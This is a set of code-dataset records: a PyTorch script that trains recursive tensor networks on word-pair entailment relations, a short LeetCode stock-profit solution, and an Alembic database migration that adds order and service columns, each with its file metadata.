self.classifierBias, self.Dense, self.DenseBias, self.Vocab]\n        self.lamb = lamb\n\n    def extract_val(self, leaf):\n        return self.Vocab.index_select(0, torch.tensor(leaf.wordIndex))\n\n    def combine_vals(self, l_val, r_val):\n        intermediate = torch.squeeze(torch.matmul(l_val, self.matrices))\n        t_r_val = torch.t(r_val)\n        tensor_out = torch.t(torch.mm(intermediate, t_r_val))\n\n        concated = torch.cat((l_val, r_val), dim=1)\n        additive = torch.mm(concated, self.matrix)\n\n        tensor_out += additive\n        tensor_out += self.bias\n        return self.tanh(tensor_out)\n\n    def classify(self, l_val, r_val):\n\n        intermediate = torch.squeeze(torch.matmul(l_val, self.classifierMatrices))\n        t_r_val = torch.t(r_val)\n        tensor_out = torch.t(torch.mm(torch.t(intermediate), t_r_val))\n\n        concated = torch.cat((l_val, r_val), dim=1)\n        additive = torch.mm(concated, self.classifierMatrix)\n\n        tensor_out += additive\n        tensor_out += self.classifierBias\n        tensor_out = self.leakyRelu(tensor_out)\n        tensor_out = torch.mm(tensor_out, self.Dense)\n        tensor_out += self.DenseBias\n\n        return self.softmax(self.leakyRelu(tensor_out))\n\n    def add_tree_network(self, t):\n        if len(t.daughters) == 0:\n            return self.extract_val(t)\n        l = t.daughters[0]\n        r = t.daughters[1]\n        left_val = None\n        right_val = None\n        if len(l.daughters) != 0:\n            left_val = self.add_tree_network(l)\n        else:\n            left_val = self.extract_val(l)\n        if len(r.daughters) != 0:\n            right_val = self.add_tree_network(r)\n        else:\n            right_val = self.extract_val(r)\n        return self.combine_vals(left_val, right_val)\n\n    def forward(self, lt, rt):\n        lt_val = self.add_tree_network(lt)\n        rt_val = self.add_tree_network(rt)\n        result = torch.squeeze(self.classify(lt_val, rt_val))\n\n        return result\n\n    def get_vals(self, lt, rt):\n        lt_val = self.add_tree_network(lt)\n        rt_val = self.add_tree_network(rt)\n        return lt_val, rt_val\n\n    def update_params(self):\n        for el in self.trainable:\n            el.data -= self.learning_rate * el.grad\n            el.grad.zero_()\n\n    def get_regularizations(self):\n        l2_reg = Variable(torch.zeros(1), requires_grad=True)\n        for W in self.trainable:\n            l2_reg = l2_reg + W.norm(2)\n        return l2_reg*self.lamb\n\n\nclass Experiment:\n    def __init__(self, DIM=16, PENULT=45, learning_rate=.2, lamb = .0002, filename='../bowman_vector-entailment-ICLR14-R1/wordpairs-v2.tsv'):\n        data_file = filename\n        self.wordMap, self.relationMap, self.relations = loadTrainingData(data_file)\n        print('Loading data')\n        self.data = loadData(None, None, None, self.wordMap, self.relationMap)\n        print('Data loaded!')\n        self.net = Net(self.wordMap, 
self.relations, DIM=DIM, PENULT=PENULT, lamb=lamb, learning_rate=learning_rate)\n        print(self.net)\n\n    def balance(self):\n        r = {}\n        for d in self.data:\n            for line in d:\n                if line['relation'] not in r:\n                    r[line['relation']] = 0\n                r[line['relation']] += 1\n        for key in r:\n            print(key, r[key])\n\n    def run(self, train_split=.9, batch_size = 32, epochs = 5, discount=.75):\n        print(self.net.DIM, self.net.PENULT, self.net.learning_rate, self.net.lamb, train_split, batch_size, epochs)\n        training = []\n        testing = []\n        percentage = train_split\n        for d in self.data:\n            file_data = []\n            for line in d:\n                file_data.append(line)\n            training.extend(file_data[:int(percentage*len(file_data))])\n            testing.extend(file_data[int(percentage*len(file_data)):])\n\n        random.shuffle(training)\n        random.shuffle(testing)\n        print('Training Length', len(training))\n        print('Testing Length', len(testing))\n        loss = 0\n        train_num = 0\n\n        for epoch in tqdm.tqdm(range(epochs)):  # loop over the dataset multiple times\n            total_loss = 0\n            print('Beginning Epoch number', epoch)\n            successes = 0\n            total = 0\n            y_true = []\n            y_pred = []\n            for line in training:\n                train_num += 1\n                left_tree = line['left_tree']\n                right_tree = line['right_tree']\n                relation = line['relation']\n\n                true_out = self.relationMap[relation]\n\n                outputs = self.net(left_tree, right_tree)\n                if torch.tensor(true_out) == torch.argmax(outputs):\n                    successes += 1\n                y_true.append(true_out)\n                y_pred.append(torch.argmax(outputs).item())\n                total += 1\n\n                loss += -torch.log(outputs[true_out])\n                if train_num % batch_size == 0:\n                    loss += self.net.get_regularizations()[0]\n                    total_loss += loss.item()\n                    loss.backward()\n                    self.net.update_params()\n                    loss = 0\n            print(confusion_matrix(y_true, y_pred))\n            self.net.learning_rate *= discount\n            print('Total Loss:', total_loss)\n            print('Training Accuracy:', successes/total, successes)\n            successes = 0\n            total = 0\n            y_true = []\n            y_pred = []\n            for line in testing:\n                left_tree = line['left_tree']\n                right_tree = line['right_tree']\n                relation = line['relation']\n\n                true_out = self.relationMap[relation]\n\n                outputs = self.net(left_tree, right_tree)\n                if torch.tensor(true_out) == torch.argmax(outputs):\n                    successes += 1\n                y_true.append(true_out)\n                y_pred.append(torch.argmax(outputs).item())\n                total += 1\n            print(confusion_matrix(y_true, y_pred))\n            print('Testing Accuracy:', successes/total, successes)\n\nclass FFNN(nn.Module):\n    def __init__(self, DIM, relationMap, learning_rate=.2):\n        super(FFNN, self).__init__()\n        self.DIM = DIM\n        self.relationMap = relationMap\n        self.middle = 40\n        self.num_relations = len([key for key in relationMap])\n        self.learning_rate = learning_rate\n        dtype = torch.FloatTensor\n        self.Dense = Variable(torch.rand(2*(DIM+DIM+self.num_relations), self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseOut = Variable(torch.rand(self.middle, 1).type(dtype)*.02-.01, requires_grad=True)\n        self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n        self.trainable = [self.Dense, self.DenseBias, self.DenseOut, self.BiasOut]\n\n    def forward(self, left_vec, right_vec):\n        left_tensor = 
torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n        right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n        left_tensor = left_tensor.type(torch.FloatTensor)\n        right_tensor = right_tensor.type(torch.FloatTensor)\n        inp = torch.cat((left_tensor, right_tensor), dim=1)\n        mid = torch.mm(inp, self.Dense) + self.DenseBias\n        out = torch.mm(mid, self.DenseOut) + self.BiasOut\n        return out\n\n    def update_params(self):\n        for el in self.trainable:\n            el.data -= self.learning_rate * el.grad\n            el.grad.zero_()\n\nclass FFCNN(nn.Module):\n    def __init__(self, DIM, relationMap, learning_rate=.2):\n        super(FFCNN, self).__init__()\n        self.DIM = DIM\n        self.relationMap = relationMap\n        self.middle = 20\n        self.num_relations = len([key for key in relationMap])\n        self.learning_rate = learning_rate\n        dtype = torch.FloatTensor\n        self.DenseLeft = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseRight = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseLeftBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseRightBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseOut = Variable(torch.rand(self.middle*2, 1).type(dtype)*.02-.01, requires_grad=True)\n        self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n        self.trainable = [self.DenseLeft, self.DenseRight, self.DenseLeftBias, self.DenseRightBias, self.DenseOut, self.BiasOut]\n\n    def forward(self, left_vec, right_vec):\n        left_tensor = torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n        right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n        left_tensor = left_tensor.type(torch.FloatTensor)\n        right_tensor = right_tensor.type(torch.FloatTensor)\n        left_mid = torch.mm(left_tensor, self.DenseLeft) + self.DenseLeftBias\n        right_mid = torch.mm(right_tensor, self.DenseRight) + self.DenseRightBias\n        mid = torch.cat((left_mid, right_mid), dim=1)\n        out = torch.mm(mid, self.DenseOut) + self.BiasOut\n        return out\n\n    def update_params(self):\n        for el in self.trainable:\n            el.data -= self.learning_rate * el.grad\n            el.grad.zero_()\n\nclass COMPNN(nn.Module):\n    def __init__(self, DIM, relationMap, learning_rate=.2):\n        super(COMPNN, self).__init__()\n        self.DIM = DIM\n        self.relationMap = relationMap\n        self.middle = 20\n        self.num_relations = len([key for key in relationMap])\n        self.learning_rate = learning_rate\n        dtype = torch.FloatTensor\n        self.matrices = Variable(torch.rand(DIM, DIM, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.matrix = Variable(torch.rand(DIM*2, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.bias = Variable(torch.rand(1, DIM).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseLeft = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseRight = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseLeftBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseRightBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n        self.DenseOut = Variable(torch.rand(self.middle*2, 1).type(dtype)*.02-.01, requires_grad=True)\n        self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n        self.tanh = nn.Tanh()\n        self.trainable = [self.DenseLeft, self.DenseRight, self.DenseLeftBias, 
self.DenseRightBias, self.DenseOut, self.BiasOut]\n\n def combine_vals(self, l_val, r_val):\n intermediate = torch.squeeze(torch.matmul(l_val, self.matrices))\n t_r_val = torch.t(r_val)\n tensor_out = torch.t(torch.mm(intermediate, t_r_val))\n\n concated = torch.cat((l_val, r_val), dim=1)\n additive = torch.mm( concated ,self.matrix)\n\n tensor_out += additive\n tensor_out += self.bias\n return self.tanh(tensor_out)\n\n def forward(self, left_vec, right_vec):\n #import pdb; pdb.set_trace()\n left_tensor = torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n left_tensor = left_tensor.type(torch.FloatTensor)\n right_tensor = right_tensor.type(torch.FloatTensor)\n left_mid = torch.mm(left_tensor, self.DenseLeft) + self.DenseLeftBias\n right_mid = torch.mm(right_tensor, self.DenseRight) + self.DenseRightBias\n mid = torch.cat((left_mid, right_mid), dim=1)\n out = torch.mm(mid, self.DenseOut) + self.BiasOut\n return out\n\n def update_params(self):\n for el in self.trainable:\n el.data -= self.learning_rate * el.data\n el.grad.zero_()\n\nclass PartTwo:\n def __init__(self, data, net, relationMap):\n self.data = data\n self.net = net\n self.relationMap = relationMap\n self.netTwo = FFCNN(self.net.DIM, relationMap)\n\n def convert_tree(self, lt, rt, relation):\n lt_val, rt_val = self.net.get_vals(lt, rt)\n true_out = self.relationMap[relation]\n one_hot = [0 for el in [key for key in self.relationMap.keys()] ]\n one_hot[true_out] = 1\n return np.concatenate([lt_val.data.numpy()[0], rt_val.data.numpy()[0], np.array(one_hot)])\n\n def get_dataset_data(self):\n print('Converting dataset')\n support_dict = {}\n for d in self.data:\n for line in d:\n for el in (neededRelations(None, line)):\n t = (el[0].text, el[1].text, el[2])\n support_dict[t] = el\n\n support_list = list([key for key in support_dict.keys()])\n dataset = []\n self.converted_dataset = []\n for d in self.data:\n for line in d:\n line_support_set = neededRelations(None, line)\n line_support_hash = set([(el[0].text, el[1].text, el[2]) for el in line_support_set])\n false_examples = []\n while len(false_examples) != len(line_support_set):\n false_example_guess = random.sample(support_list, len(line_support_set)*2)\n for el in false_example_guess:\n if el not in line_support_hash:\n false_examples.append(support_dict[el])\n if len(false_examples) == len(line_support_set):\n break\n for el in line_support_set:\n dataset.append((line, {'left_tree':el[0], 'right_tree':el[1], 'relation':el[2]}, True))\n conv_line = self.convert_tree(line['left_tree'], line['right_tree'], line['relation'])\n conv_el = self.convert_tree(el[0], el[1], el[2])\n self.converted_dataset.append((conv_line, conv_el, 1))\n for el in false_examples:\n dataset.append((line, {'left_tree':el[0], 'right_tree':el[1], 'relation':el[2]}, False))\n conv_line = self.convert_tree(line['left_tree'], line['right_tree'], line['relation'])\n conv_el = self.convert_tree(el[0], el[1], el[2])\n self.converted_dataset.append((conv_line, conv_el, 0))\n print('Finished Converting!')\n\n def run(self, epochs = 5):\n self.get_dataset_data()\n random.shuffle(self.converted_dataset)\n training = self.converted_dataset[:int(.8*len(self.converted_dataset))]\n testing = self.converted_dataset[int(.8*len(self.converted_dataset)):]\n for epoch in range(epochs):\n total_loss = 0\n correct = 0\n total = 0\n for el in training:\n output = self.netTwo(el[0], el[1])\n correct += round(output.item())==el[2]\n total += 1\n true = 
torch.tensor(el[2])\n true = true.type(torch.FloatTensor)\n loss = -torch.log(torch.abs(true-output))[0][0]\n total_loss += loss\n loss.backward()\n self.netTwo.update_params()\n print(\"Epoch\",epoch,\"loss:\",total_loss/len(self.converted_dataset))\n print(\"Correct:\",correct/total)\n correct = 0\n total = 0\n for el in testing:\n output = self.netTwo(el[0], el[1])\n correct += round(output.item())==el[2]\n total += 1\n print(\"Test Correct:\",correct/total)\n\nprint('Learning Rate Experiments')\nprint('\\nExperiment 1\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.2, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 0, discount=.75)\np2 = PartTwo(e.data, e.net, e.relationMap)\np2.run()\n\n\n'''\nprint('\\nExperiment 2\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.1, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 3\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.05, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 4\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.01, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 5\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.4, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 6\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.3, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 7\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.005, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 8\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.001, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\n\n\n\n'''\n\n\n\n\n\n\n", "sub_path": "misc/FullTorch.py", "file_name": "FullTorch.py", "file_ext": "py", "file_size_in_byte": 20653, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", 
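Net.combine_vals above implements the bilinear (neural-tensor) composition tanh(l^T T r + W [l; r] + b) through a sequence of squeeze, transpose, and mm calls. The same computation can be stated more directly with einsum; this is a re-derivation for clarity, not code from the file:

import torch

def combine(l, r, T, W, b):
    # l, r: (1, d); T: (d, d, d); W: (2d, d); b: (1, d)
    # 'bj,ijk,bk->bi' reproduces the intermediate/mm/transpose sequence above:
    # out[i] = sum over j, k of l[j] * T[i, j, k] * r[k]
    bilinear = torch.einsum('bj,ijk,bk->bi', l, T, r)
    affine = torch.cat((l, r), dim=1) @ W  # W [l; r]
    return torch.tanh(bilinear + affine + b)

d = 4
l, r = torch.rand(1, d), torch.rand(1, d)
out = combine(l, r, torch.rand(d, d, d), torch.rand(2 * d, d), torch.rand(1, d))
assert out.shape == (1, d)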
"line_number": 33, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "LoadTrainingData.loadTrainingData", "line_number": 139, "usage_type": "call"}, {"api_name": "load_data.loadData", "line_number": 141, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 169, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 170, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 231, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 236, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 247, "usage_type": "call"}, 
{"api_name": "torch.rand", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 255, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 256, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 267, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 275, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.mm", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 301, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 301, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 309, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 310, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 310, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 315, "usage_type": 
"call"}, {"api_name": "torch.rand", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 323, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 336, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.mm", "line_number": 339, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 340, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 341, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "neededRelations.neededRelations", "line_number": 369, "usage_type": "call"}, {"api_name": "neededRelations.neededRelations", "line_number": 378, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 382, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 414, "usage_type": "attribute"}, {"api_name": "torch.log", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "297308686", "text": "from typing import List\n\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n for i in range(1, len(prices)):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n\n return profit\n\n\nif __name__ == '__main__':\n sol = Solution()\n assert sol.maxProfit([7,1,5,3,6,4]) == 7, \"wrong\"\n assert sol.maxProfit([1,2,3,4,5]) == 4, \"wrong\"", "sub_path": "easy/Best_Time_to_Buy_and_Sell_Stock_II.py", "file_name": "Best_Time_to_Buy_and_Sell_Stock_II.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "521050168", "text": "\"\"\"orders\n\nRevision ID: 276ff79ed610\nRevises: 839020a2f1db\nCreate Date: 2020-07-12 11:30:34.076689\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '276ff79ed610'\ndown_revision = '839020a2f1db'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands 
auto generated by Alembic - please adjust! ###\n op.add_column('orders', sa.Column('coupon', sa.String(length=20), nullable=True))\n op.alter_column('orders', 'paymentMethod',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.alter_column('orders', 'paymentStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.alter_column('orders', 'thunderserviceStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.add_column('thunderservice', sa.Column('duration', sa.Integer(), nullable=True))\n op.add_column('thunderservice', sa.Column('onSalePrice', sa.Float(), nullable=True))\n op.add_column('thunderservice', sa.Column('promotion', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('thunderservice', 'promotion')\n op.drop_column('thunderservice', 'onSalePrice')\n op.drop_column('thunderservice', 'duration')\n op.alter_column('orders', 'thunderserviceStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.alter_column('orders', 'paymentStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.alter_column('orders', 'paymentMethod',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.drop_column('orders', 'coupon')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/276ff79ed610_orders.py", "file_name": "276ff79ed610_orders.py", "file_ext": "py", "file_size_in_byte": 1916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 26, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, 